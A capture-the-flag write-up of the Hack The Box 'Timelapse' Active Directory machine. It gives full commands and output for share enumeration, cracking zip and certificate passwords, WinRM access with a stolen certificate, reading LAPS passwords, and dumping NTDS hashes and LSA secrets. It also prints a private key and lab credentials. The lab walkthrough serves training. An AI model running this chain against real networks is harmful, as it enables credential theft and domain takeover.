HTB - Timelapse
Enumeration
Scope
IP Address: 10.10.11.152
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ nmap -p- --min-rate 10000 $ip -P
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
88/tcp open kerberos-sec syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
389/tcp open ldap syn-ack
445/tcp open microsoft-ds syn-ack
464/tcp open kpasswd5 syn-ack
5986/tcp open wsmans syn-ack
9389/tcp open adws syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ sudo nmap -sU $ip --min-rate 10000 --open -v -oN udp-scan -p1-10000
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ nmap -sCV -p53,88,135,139,389,445,464,5986,9389 $ip -Pn -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-08 22:57:28Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
| tls-alpn:
|_ http/1.1
|_ssl-date: 2024-07-08T22:58:52+00:00; +8h00m03s from scanner time.
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after: 2022-10-25T14:25:29
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 8h00m02s, deviation: 0s, median: 8h00m02s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-07-08T22:58:13
|_ start_date: N/A
* Open ports: 53 - 88 - 135 - 139 - 389 - 445 - 464 - 5986 - 9389
* UDP Open ports: 53 - 88 - 123 - 389
* Services: DNS - KERBEROS - RPC - SMB - winRM over SSL - LDAP
* Important Notes: FQSN: dc01.timelapse.htb - Domain: timelapse.htbRPC
Nothing from rpc
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ rpcclient -U "%" $ip
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIEDSMB
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ smbclient -N -L //$ip
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ smbclient -N \\\\$ip\\shares
smb: \> ls
. D 0 Mon Oct 25 11:39:15 2021
.. D 0 Mon Oct 25 11:39:15 2021
Dev D 0 Mon Oct 25 15:40:06 2021
HelpDesk D 0 Mon Oct 25 11:48:42 2021
6367231 blocks of size 4096. 1252508 blocks availableI will mount the share locally for easily navigation. Press Enter if prompted
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ sudo mount -t cifs "\\\\$ip\\shares" ./mount
Password for root@\\10.10.11.152\shares: I will explore each file one by one, Let's start with the .zip file
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ tree mount
mount
├── Dev
│ └── winrm_backup.zip
└── HelpDesk
├── LAPS.x64.msi
├── LAPS_Datasheet.docx
├── LAPS_OperationsGuide.docx
└── LAPS_TechnicalSpecification.docxThe other files talk about
LAPSas a security solutions and how to install it, So we can guess thatLAPSis installed on that machine
I tried to unzip it but it was password protected
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ unzip winrm_backup.zip
Archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
skipping: legacyy_dev_auth.pfx incorrect passwordThen, I will attempt to extract the hash from it and try to crack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ zip2john winrm_backup.zip > zip.hash
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ john zip.hash --wordlist=/usr/share/wordlists/rockyou.txt
<snip>
supremelegacy (winrm_backup.zip/legacyy_dev_auth.pfx)
<snip>
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ john zip.hash --show
winrm_backup.zip/legacyy_dev_auth.pfx:supremelegacy:legacyy_dev_auth.pfx:winrm_backup.zip::winrm_backup.zipExtracting the archive content with 7z
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ 7z x winrm_backup.zip
<snip>
Enter password (will not be echoed):
Everything is Ok
Size: 2555
Compressed: 2611
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ ls
Nmap legacyy_dev_auth.pfx mount winrm_backup.zip zip.hashI searched online for more info about that file and got this.
So, I can extract files like private keys or certificates. We can do this with openssl tool. I also searched for the exact command to what we need and ChatGPT was very useful.
Here are examples of what we can use
openssl pkcs12 -in <file>.pfx -nocerts -out privatekey.pem
openssl pkcs12 -in <file>.pfx -clcerts -nokeys -out certificate.pem
openssl rsa -in privatekey.pem -out privatekey.key
openssl x509 -in certificate.pem -out certificate.crtWhen I tried to open the file, it failed cause it was password-protected
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out privatekey.pem
Enter Import Password:
Mac verify error: invalid password?So, I will do the same thing as the .zip file
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ john pfx.hash --wordlist=/usr/share/wordlists/rockyou.txt
<snip>
thuglegacy (legacyy_dev_auth.pfx)
<snip>
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ john pfx.hash --show
legacyy_dev_auth.pfx:thuglegacy:::::legacyy_dev_auth.pfxI'm ready now to get the content of legacyy_dev_auth.pfx
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out privatekey.pem
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out certificate.pem
openssl x509 -in certificate.pem -out certificate.crt
openssl rsa -in privatekey.pem -out privatekey.keyShowing the extracted files
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ cat privatekey.key
-----BEGIN PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQClVgejYhZHHuLz
TSOtYXHOi56zSocr9om854YDu/6qHBa4Nf8xFP6INNBNlYWvAxCvKM8aQsHpv3to
pwpQ+YbRZDu1NxyhvfNNTRXjdFQV9nIiKkowOt6gG2F+9O5gVF4PAnHPm+YYPwsb
oRkYV8QOpzIi6NMZgDCJrgISWZmUHqThybFW/7POme1gs6tiN1XFoPu1zNOYaIL3
dtZaazXcLw6IpTJRPJAWGttqyFommYrJqCzCSaWu9jG0p1hKK7mk6wvBSR8QfHW2
qX9+NbLKegCt+/jAa6u2V9lu+K3MC2NaSzOoIi5HLMjnrujRoCx3v6ZXL0KPCFzD
MEqLFJHxAgMBAAECggEAc1JeYYe5IkJY6nuTtwuQ5hBc0ZHaVr/PswOKZnBqYRzW
fAatyP5ry3WLFZKFfF0W9hXw3tBRkUkOOyDIAVMKxmKzguK+BdMIMZLjAZPSUr9j
PJFizeFCB0sR5gvReT9fm/iIidaj16WhidQEPQZ6qf3U6qSbGd5f/KhyqXn1tWnL
GNdwA0ZBYBRaURBOqEIFmpHbuWZCdis20CvzsLB+Q8LClVz4UkmPX1RTFnHTxJW0
Aos+JHMBRuLw57878BCdjL6DYYhdR4kiLlxLVbyXrP+4w8dOurRgxdYQ6iyL4UmU
Ifvrqu8aUdTykJOVv6wWaw5xxH8A31nl/hWt50vEQQKBgQDYcwQvXaezwxnzu+zJ
7BtdnN6DJVthEQ+9jquVUbZWlAI/g2MKtkKkkD9rWZAK6u3LwGmDDCUrcHQBD0h7
tykwN9JTJhuXkkiS1eS3BiAumMrnKFM+wPodXi1+4wJk3YTWKPKLXo71KbLo+5NJ
2LUmvvPDyITQjsoZoGxLDZvLFwKBgQDDjA7YHQ+S3wYk+11q9M5iRR9bBXSbUZja
8LVecW5FDH4iTqWg7xq0uYnLZ01mIswiil53+5Rch5opDzFSaHeS2XNPf/Y//TnV
1+gIb3AICcTAb4bAngau5zm6VSNpYXUjThvrLv3poXezFtCWLEBKrWOxWRP4JegI
ZnD1BfmQNwKBgEJYPtgl5Nl829+Roqrh7CFti+a29KN0D1cS/BTwzusKwwWkyB7o
btTyQf4tnbE7AViKycyZVGtUNLp+bME/Cyj0c0t5SsvS0tvvJAPVpNejjc381kdN
71xBGcDi5ED2hVj/hBikCz2qYmR3eFYSTrRpo15HgC5NFjV0rrzyluZRAoGAL7s3
QF9Plt0jhdFpixr4aZpPvgsF3Ie9VOveiZAMh4Q2Ia+q1C6pCSYk0WaEyQKDa4b0
6jqZi0B6S71un5vqXAkCEYy9kf8AqAcMl0qEQSIJSaOvc8LfBMBiIe54N1fXnOeK
/ww4ZFfKfQd7oLxqcRADvp1st2yhR7OhrN1pfl8CgYEAsJNjb8LdoSZKJZc0/F/r
c2gFFK+MMnFncM752xpEtbUrtEULAKkhVMh6mAywIUWaYvpmbHDMPDIGqV7at2+X
TTu+fiiJkAr+eTa/Sg3qLEOYgU0cSgWuZI0im3abbDtGlRt2Wga0/Igw9Ewzupc8
A5ZZvI+GsHhm0Oab7PEWlRY=
-----END PRIVATE KEY-----
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ cat certificate.crt
-----BEGIN CERTIFICATE-----
MIIDJjCCAg6gAwIBAgIQHZmJKYrPEbtBk6HP9E4S3zANBgkqhkiG9w0BAQsFADAS
MRAwDgYDVQQDDAdMZWdhY3l5MB4XDTIxMTAyNTE0MDU1MloXDTMxMTAyNTE0MTU1
MlowEjEQMA4GA1UEAwwHTGVnYWN5eTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC
AQoCggEBAKVWB6NiFkce4vNNI61hcc6LnrNKhyv2ibznhgO7/qocFrg1/zEU/og0
0E2Vha8DEK8ozxpCwem/e2inClD5htFkO7U3HKG9801NFeN0VBX2ciIqSjA63qAb
YX707mBUXg8Ccc+b5hg/CxuhGRhXxA6nMiLo0xmAMImuAhJZmZQepOHJsVb/s86Z
7WCzq2I3VcWg+7XM05hogvd21lprNdwvDoilMlE8kBYa22rIWiaZismoLMJJpa72
MbSnWEoruaTrC8FJHxB8dbapf341ssp6AK37+MBrq7ZX2W74rcwLY1pLM6giLkcs
yOeu6NGgLHe/plcvQo8IXMMwSosUkfECAwEAAaN4MHYwDgYDVR0PAQH/BAQDAgWg
MBMGA1UdJQQMMAoGCCsGAQUFBwMCMDAGA1UdEQQpMCegJQYKKwYBBAGCNxQCA6AX
DBVsZWdhY3l5QHRpbWVsYXBzZS5odGIwHQYDVR0OBBYEFMzZDuSvIJ6wdSv9gZYe
rC2xJVgZMA0GCSqGSIb3DQEBCwUAA4IBAQBfjvt2v94+/pb92nLIS4rna7CIKrqa
m966H8kF6t7pHZPlEDZMr17u50kvTN1D4PtlCud9SaPsokSbKNoFgX1KNX5m72F0
3KCLImh1z4ltxsc6JgOgncCqdFfX3t0Ey3R7KGx6reLtvU4FZ+nhvlXTeJ/PAXc/
fwa2rfiPsfV51WTOYEzcgpngdHJtBqmuNw3tnEKmgMqp65KYzpKTvvM1JjhI5txG
hqbdWbn2lS4wjGy3YGRZw6oM667GF13Vq2X3WHZK5NaP+5Kawd/J+Ms6riY0PDbh
nx143vIioHYMiGCnKsHdWiMrG2UWLOoeUrlUmpr069kY/nn7+zSEa2pA
-----END CERTIFICATE-----Shell as Legacyy
Now, I have private key and certificate, but I don't have any valid credentials, So I must continue the enumeration.
I move the .pfx file to my windows machine and open it to get more information. when I click on the file it opened this wizard
I completed the steps, provided the password and the certificate was stored on my machine. Then, I opened User certification manager
Under Certificates - Current User => Personal => Certificates I could see it
So, We now know that Legacyy User issued this certificate.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ evil-winrm -h
Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUB
LIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] [--spn SPN_PREFIX] [-l]
-S, --ssl Enable ssl
-c, --pub-key PUBLIC_KEY_PATH Local path to public key certificate
-k, --priv-key PRIVATE_KEY_PATH Local path to private key certificate
-r, --realm DOMAIN Kerberos auth, it has to be set also in /etc/krb5.conf file using this format -
> CONTOSO.COM = { kdc = fooserver.contoso.com }
-s, --scripts PS_SCRIPTS_PATH Powershell scripts local path
--spn SPN_PREFIX SPN prefix for Kerberos auth (default HTTP)
-e, --executables EXES_PATH C# executables local path
-i, --ip IP Remote host IP or hostname. FQDN for Kerberos auth (required)
-U, --url URL Remote url endpoint (default /wsman)
-u, --user USER Username (required if not using kerberos)
-p, --password PASS Password
-H, --hash HASH NTHash
-P, --port PORT Remote host port (default 5985)
-V, --version Show version
-n, --no-colors Disable colors
-N, --no-rpath-completion Disable remote path completion
-l, --log Log the WinRM session
-h, --help Display this help messageI opened the help menu of
evil-winrmto see available options-Sto enable SSL-kto provide private key-cfor certificate-pfor port number
I don't know the password but I think it's not required since we have the private key and the certificate, also we must provide alternative port number other than the default because we saw that Nmap output showed 5985 port number is closed but 5986 is opened which is used for winRM over SSl
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ evil-winrm -i $ip -u Legacyy -S -k privatekey.key -c certificate.crt -p Legaccy
*Evil-WinRM* PS C:\Users\legacyy\Documents> *Evil-WinRM* PS C:\Users\legacyy\Documents> type ..\Desktop\user.txt
de885f236945cfd319e4dxxxxxxxxxxxxUser Flag: de885f236945cfd319e4dxxxxxxxxxxxx
Bloodhound
We're on active directory environment, So I will call bloodhound to join us.
*Evil-WinRM* PS C:\Users\legacyy\Documents> upload SharpHound.exe
*Evil-WinRM* PS C:\Users\legacyy\Documents> .\SharpHound.exe -c all --zipfilename timelapse
<snip>
2024-07-08T17:02:04.7467230-07:00|INFORMATION|Enumeration finished in 00:00:44.6703145
2024-07-08T17:02:04.8873443-07:00|INFORMATION|SharpHound Enumeration Completed at 5:02 PM on 7/8/2024! Happy Graphing!*Evil-WinRM* PS C:\Users\legacyy\Documents> dir
Directory: C:\Users\legacyy\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/8/2024 5:02 PM 12188 20240708170204_timelapse.zip
-a---- 7/8/2024 5:02 PM 10603 NzcwYWNhMTEtODlmNS00OTNiLWEyNjAtZDQ2YjczY2QzMDk2.bin
-a---- 7/8/2024 5:00 PM 906752 SharpHound.exeI started smb server on my kail machine and authenticate the windows box to my server
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ smbserver
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed*Evil-WinRM* PS C:\Users\legacyy\Documents> net use n: \\10.10.16.3\share /user:blind0bandit blind0bandit
The command completed successfully.
*Evil-WinRM* PS C:\Users\legacyy\Documents> move 20240708170204_timelapse.zip n:On my kali machine I will start bloodhound and upload the zip file
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ sudo neo4j start
[sudo] password for kali:
Directories in use:
home: /usr/share/neo4j
config: /usr/share/neo4j/conf
logs: /etc/neo4j/logs
plugins: /usr/share/neo4j/plugins
import: /usr/share/neo4j/import
data: /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses: /usr/share/neo4j/licenses
run: /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:60457). It is available at http://localhost:7474
There may be a short delay until the server is ready.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ bloodhoundUnder C:\Users there are several users. I will enumerate them in bloodhound
*Evil-WinRM* PS C:\Users> dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/23/2021 11:27 AM Administrator
d----- 10/25/2021 8:22 AM legacyy
d-r--- 10/23/2021 11:27 AM Public
d----- 10/25/2021 12:23 PM svc_deploy
d----- 2/23/2022 5:45 PM TRXShell as SVC_Deploy
SVC_DEPLOY user is a member of LAPS_READERS which has the ability to read LAPS password, which is the password of the local administrator, So if we get this account, we will be able to take control of admin account
When I list the content of C:\Program Files, I can see that LAPS is installed as I guessed
*Evil-WinRM* PS C:\> dir "Program Files"
Directory: C:\Program Files
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/23/2021 11:28 AM Common Files
d----- 3/3/2022 10:01 PM internet explorer
d----- 10/25/2021 9:01 AM LAPS
d----- 3/3/2022 10:10 PM VMware
d-r--- 3/3/2022 10:01 PM Windows Defender
d----- 3/21/2022 8:45 PM Windows Defender Advanced Threat Protection
d----- 3/3/2022 10:01 PM Windows Mail
d----- 3/3/2022 10:01 PM Windows Media Player
d----- 9/15/2018 12:19 AM Windows Multimedia Platform
d----- 9/15/2018 12:28 AM windows nt
d----- 3/3/2022 10:01 PM Windows Photo Viewer
d----- 9/15/2018 12:19 AM Windows Portable Devices
d----- 9/15/2018 12:19 AM Windows Security
d----- 9/15/2018 12:19 AM WindowsPowerShellI searched for password for user svc_deploy everywhere and I found it in powershell history file of user legacyy
*Evil-WinRM* PS C:\Users\legacyy\Documents> type C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exitI used the credential found to obtain a shell
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ evil-winrm -i $ip -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S -P 5986
<snip>
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Shell as Administrator
Now, I can read the password of local admin. I will use LAPSToolkit.ps1
*Evil-WinRM* PS C:\Tools> upload LAPSToolkit.ps1
*Evil-WinRM* PS C:\Tools> import-module .\LAPSToolkit.ps1
*Evil-WinRM* PS C:\Tools> Get-LAPSComputers
ComputerName Password Expiration
------------ -------- ----------
dc01.timelapse.htb K[{h[SYYlK7v3+y.xxxxxxx 07/13/2024 15:49:00Access the machine with wmisexec.py
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ impacket-wmiexec timelapse.htb/administrator@$ip
Password:
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>The flag wasn't in administrator home directory but was in TRX user home
C:\Users>type C:\Users\TRX\Desktop\root.txt
63cbfac24c2514d221cxxxxxxxxxxxxxRoot Flag: 63cbfac24c2514d221cxxxxxxxxxxxxx
Optional
Dump ntds database
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ crackmapexec smb $ip -u 'administrator' -p 'K[{h[SYYlK7v3+y.xxxxxxx' --ntds
SMB 10.10.11.152 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.152 445 DC01 [+] timelapse.htb\administrator:K[{h[SYYlK7v3+y.gN2i1dq6 (Pwn3d!)
SMB 10.10.11.152 445 DC01 [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.10.11.152 445 DC01 Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c633191d8a151f59e17bd18ac49603d:::
SMB 10.10.11.152 445 DC01 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.11.152 445 DC01 krbtgt:502:aad3b435b51404eeaad3b435b51404ee:2960d580f05cd511b3da3d3663f3cb37:::
SMB 10.10.11.152 445 DC01 timelapse.htb\thecybergeek:1601:aad3b435b51404eeaad3b435b51404ee:c81875d2b3cd404f3c8eadc820248f06:::
SMB 10.10.11.152 445 DC01 timelapse.htb\payl0ad:1602:aad3b435b51404eeaad3b435b51404ee:f63b1edaad2ee253c3c228c6e08d1ea0:::
SMB 10.10.11.152 445 DC01 timelapse.htb\legacyy:1603:aad3b435b51404eeaad3b435b51404ee:93da975bcea111839cc584f2f528d63e:::
SMB 10.10.11.152 445 DC01 timelapse.htb\sinfulz:1604:aad3b435b51404eeaad3b435b51404ee:72b236d9b0d49860267f752f1dfc8103:::
SMB 10.10.11.152 445 DC01 timelapse.htb\babywyrm:1605:aad3b435b51404eeaad3b435b51404ee:d47c7e33d6911bb742fdf040af2e80da:::
SMB 10.10.11.152 445 DC01 timelapse.htb\svc_deploy:3103:aad3b435b51404eeaad3b435b51404ee:c912f3533b7114980dd7b6094be1a9d8:::
SMB 10.10.11.152 445 DC01 timelapse.htb\TRX:5101:aad3b435b51404eeaad3b435b51404ee:4c7121d35cd421cbbd3e44ce83bc923e:::
SMB 10.10.11.152 445 DC01 DC01$:1000:aad3b435b51404eeaad3b435b51404ee:f2a0c7ce9c3eb681fe94927241abf796:::
SMB 10.10.11.152 445 DC01 DB01$:1606:aad3b435b51404eeaad3b435b51404ee:d9c629d35e3311abba1631dba29ead96:::
SMB 10.10.11.152 445 DC01 WEB01$:1607:aad3b435b51404eeaad3b435b51404ee:3b2910d8e6c79bbb20e8842ea4a9aeac:::
SMB 10.10.11.152 445 DC01 DEV01$:1608:aad3b435b51404eeaad3b435b51404ee:463c7639ff204594dfbebbe71b3c6dbb:::
SMB 10.10.11.152 445 DC01 [+] Dumped 14 NTDS hashes to /home/kali/.cme/logs/DC01_10.10.11.152_2024-07-08_135412.ntds of which 10 were added to the databaseDump lsass process
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Timelapse]
└─$ crackmapexec smb $ip -u 'administrator' -p 'K[{h[SYYlK7v3+y.xxxxxxxx' --lsa
SMB 10.10.11.152 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.152 445 DC01 [+] timelapse.htb\administrator:K[{h[SYYlK7v3+y.gN2i1dq6 (Pwn3d!)
SMB 10.10.11.152 445 DC01 [+] Dumping LSA secrets
SMB 10.10.11.152 445 DC01 TIMELAPSE\DC01$:aes256-cts-hmac-sha1-96:497759614428ad680741f46f137c38dde0a3c93d9e937c31aae3fafee717e881
SMB 10.10.11.152 445 DC01 TIMELAPSE\DC01$:aes128-cts-hmac-sha1-96:037c03ecb94020155cae4538792838a0
SMB 10.10.11.152 445 DC01 TIMELAPSE\DC01$:des-cbc-md5:042c43759470084a
SMB 10.10.11.152 445 DC01 TIMELAPSE\DC01$:plain_password_hex:a3ee63eba14d0ef5dc110f66025c3c47d0c33bf18ca9b0a376eb94fecb20264f6956d662d3e946f482ccb123406d46a5b7ca62a1b8098a1299ed2fbdcae78b50dcd47c9362d1e8f8fc9beaa15c0b8412984c4d73c7a936ffc2c54dd7effcd0e84e483eda39b1499a578fbb302fe325c30ea41add8ed85e1b8b6efc670f173cc2b174771dfc48a18ade69c57c9c6739d5b16ebff18d31e9cef3f0930d08a4730c34bd113ad16c24190ea3d13b397fd701f8ffb2ed01636c7efeba9567b95c6169fbafe452d6c7bd136499192b1a76fd8dc085d1f48516dd74ff1e21e9cfdf981ed5c7327a2cb00943cc93536543f779ee
SMB 10.10.11.152 445 DC01 TIMELAPSE\DC01$:aad3b435b51404eeaad3b435b51404ee:f2a0c7ce9c3eb681fe94927241abf796:::
SMB 10.10.11.152 445 DC01 dpapi_machinekey:0xbc6b4be0de66f262c75df7ae4f7dadf34fa03ddc
dpapi_userkey:0x074fe8860a0fbca40b902c409998b1b9cd332cd1
SMB 10.10.11.152 445 DC01 NL$KM:ae8cbd2f8ab948875ff21e2c4214575e90e61caccd234226ced71fb5d37fd6446b297b58ff89bda74596ef5a96b1e1071f719d9d0fe11d1e3a95dd4f13a9a692
SMB 10.10.11.152 445 DC01 [+] Dumped 7 LSA secrets to /home/kali/.cme/logs/DC01_10.10.11.152_2024-07-08_135833.secrets and /home/kali/.cme/logs/DC01_10.10.11.152_2024-07-08_135833.cachedLast updated